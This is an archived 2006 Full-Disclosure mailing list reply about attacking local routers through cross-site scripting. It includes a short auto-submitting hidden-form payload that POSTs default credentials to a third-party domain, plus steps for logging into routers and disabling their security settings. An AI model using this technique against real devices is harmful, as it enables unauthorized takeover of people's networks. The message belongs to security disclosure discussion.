| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <44D33542.7030600@polypath.com> Date: Fri, 04 Aug 2006 13:53:38 +0200 From: Thor Larholm <thor@...ypath.com> To: "pdp (architect)" <pdp.gnucitizen@...glemail.com> Cc: Zed Qyves <zqyves.spamtrap@...il.com>, full-disclosure@...ts.grok.org.uk Subject: Re: Attacking the local LAN via XSS pdp (architect) wrote: > HTTP PORT is not possible on domain different from the current domain, > unless browser hacks is employed. I'm guessing you mean HTTP POST :) You can definitely POST any FORM to a third party domain without hacks just by calling the submit() method of your FORM which targets a hidden iframe. e.g. <iframe style="display:none" id="thirdparty" name="thirdparty"></iframe> <form name="myform" action="http://whatever.com/foo.bar" method="POST" target="thirdparty"> <input type="text" name="username" value="r00t"> <input type="text" name="password" value="default router password"> </form> <script>document.myform.submit()</script> The sequence of events would be to 1) Identify the router, 2) POST a login request with known default logins and 3) POST a change request to e.g. disable security settings or open a trust relationship. The only time consuming part is gathering router identification traits and tailoring login and change requests to specific router vendors. -- Thor Larholm _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists